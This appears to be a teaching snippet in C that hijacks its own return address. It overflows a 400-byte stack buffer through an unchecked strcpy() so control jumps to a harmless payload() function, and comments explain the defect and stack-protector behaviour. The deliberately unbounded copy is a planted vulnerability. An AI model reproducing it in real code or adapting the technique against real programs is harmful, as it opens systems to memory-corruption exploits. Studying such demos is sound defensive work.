C Programming - Self Exploit

Self Exploit < Code Snippet >.

strcpy !!!! Is she the culprit?

Note: Tested on Redhat Linux i386 platform.


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Destination of the redirected return: prints a marker and ends the process with _exit(). */
int payload();
/* d == NULL: return the byte distance from exploit()'s local buffer to its saved return
 * address.  Otherwise: strcpy() d into that 400-byte buffer with no length check. */
int exploit(char *d);

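/*
 * Drive the demonstration: measure exploit()'s frame, build a string long
 * enough to reach the saved return address, and hand it to exploit().
 *
 * Returns: 255 if exploit() returns normally, i.e. the overwrite did not
 * redirect control (on success the process is ended inside payload()).
 * Exits with EXIT_FAILURE if the measured distance would not fit in a[].
 */
int main(void) {
    char a[512] = {0};
    void *target = (void *)payload;

    /* Probe mode: byte offset from exploit()'s buffer to its saved return address. */
    int distance = exploit(NULL);

    /* The unchecked version wrote past a[] whenever the probed frame was larger
     * than expected; refuse instead of overflowing our own buffer.  Two words
     * must follow the filler: the replacement return address and a zero word
     * that also terminates the string for strcpy(). */
    if (distance < 0 || (size_t)distance + 2 * sizeof target > sizeof a) {
        fprintf(stderr, "distance %d does not fit in %zu-byte buffer\n",
                distance, sizeof a);
        return EXIT_FAILURE;
    }

    /* Non-zero filler so strcpy() copies the whole run up to the address. */
    memset(a, 0xFF, (size_t)distance);
    /* memcpy rather than a *(void **) store: a + distance need not be aligned.
     * strcpy() stops at the first zero byte, so an address containing one would
     * be copied only partially -- the demo assumes none (TODO confirm per build). */
    memcpy(a + distance, &target, sizeof target);
    /* a[] is zero-initialised, so the terminating zero word is already in place. */

    exploit(a);
    return 255;
}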

/*
* This overflows its own buffer and
* causes the return to jump to payload()
*/

/*
 * Two modes, selected by d:
 *   d == NULL  probe: walk forward from a[] until the word read equals this
 *              call's own return address, and return that byte count.
 *   otherwise  copy d into a[400] with strcpy(), i.e. with no length check;
 *              a longer d overwrites whatever lies above a[] in the frame,
 *              including the saved return address located by the probe.
 *
 * @param d  NULL for probe mode, else a NUL-terminated string to copy.
 * @return   byte distance (probe mode) or 1 (copy mode, if control returns here).
 */
int exploit(char *d) {
char a[400] = {0};
void *i;
int distance = 0;
/* payld and z are never used; presumably they pad the frame so the probe and
 * copy calls see the same layout.  NOTE(review): the compiler may drop them,
 * which is one reason the measured offset is only valid for a given build. */
char payld[sizeof(void*) + 1];
void *myret;
void *z;

if (!d) {
/* GCC builtin: the address this call will return to (in main). */
myret = __builtin_return_address(0);
/* Byte-wise scan.  Arithmetic on void* is a GCC extension and the unaligned
 * void** read is undefined behaviour in ISO C.  The loop has no upper bound:
 * if the saved return address does not lie above a[] (different frame layout)
 * it reads past the frame, and an earlier word holding the same value would
 * make it return too small a distance. */
for (i = (void*)a; *(void**)i != myret; i++) distance++;
return distance;
}
/* The defect under demonstration: no bound on the copy.  With -fstack-protector
 * a canary sits between a[] and the saved return address; the copy would
 * clobber it and the runtime aborts before this function returns. */
strcpy(a,d);
return 1;
}

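/*
 * Destination of the redirected return: prints a marker and terminates.
 *
 * Returns: never; the process ends via _exit(0).
 *
 * Control arrives here through a corrupted frame, so returning is not an
 * option and the process is ended with _exit().  _exit() does not flush
 * stdio buffers, so when stdout is not a terminal (pipe, file) the message
 * would be lost without the explicit fflush() first.
 */
int payload() {
    printf("Payload executed successfully!\n");
    fflush(stdout);
    _exit(0);
}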


